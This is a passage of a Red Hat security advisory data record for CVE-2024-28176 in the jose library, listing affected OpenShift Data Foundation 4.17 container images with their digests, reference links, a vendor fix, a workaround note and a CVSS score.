"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-28176", }, { category: "external", summary: "RHBZ#2268820", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2268820", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-28176", url: "https://www.cve.org/CVERecord?id=CVE-2024-28176", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-28176", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-28176", }, { category: "external", summary: "https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q", url: "https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q", }, ], release_date: "2024-03-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options don't meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", 